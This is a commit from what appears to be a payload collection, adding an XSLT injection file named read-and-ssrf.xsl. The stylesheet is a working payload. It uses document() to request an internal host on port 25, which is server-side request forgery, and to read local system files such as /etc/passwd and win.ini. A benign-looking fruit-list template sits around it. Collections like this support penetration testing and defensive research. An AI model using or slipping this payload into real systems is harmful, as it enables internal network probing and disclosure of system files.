XSLT payloads + Headless Browser
This commit is contained in:
14
XSLT Injection/Files/read-and-ssrf.xsl
Normal file
14
XSLT Injection/Files/read-and-ssrf.xsl
Normal file
@@ -0,0 +1,14 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
<xsl:template match="/fruits">
|
||||
<xsl:copy-of select="document('http://172.16.132.1:25')"/>
|
||||
<xsl:copy-of select="document('/etc/passwd')"/>
|
||||
<xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
|
||||
Fruits:
|
||||
<!-- Loop for each fruit -->
|
||||
<xsl:for-each select="fruit">
|
||||
<!-- Print name: description -->
|
||||
- <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
|
||||
</xsl:for-each>
|
||||
</xsl:template>
|
||||
</xsl:stylesheet>
|
||||
Reference in New Issue
Block a user